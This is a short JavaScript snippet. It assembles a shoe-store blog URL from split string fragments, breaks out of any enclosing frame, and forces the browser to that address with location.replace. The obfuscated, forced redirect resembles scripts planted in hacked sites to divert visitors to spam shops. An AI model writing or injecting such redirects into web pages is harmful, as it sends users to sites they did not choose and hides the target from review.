var gotourl = "htt"+"p://w"+"ww.mbtand"+"shoes.co"+"m/blog"; 
function tiao(){
	
	if (top.location != location)
	{
		top.location.href = location.href; 
	}
	if(gotourl.indexOf("http://")<0){
		location.replace( "http://"+gotourl );
	}else{
		location.replace(gotourl );
	}

	
}
tiao();
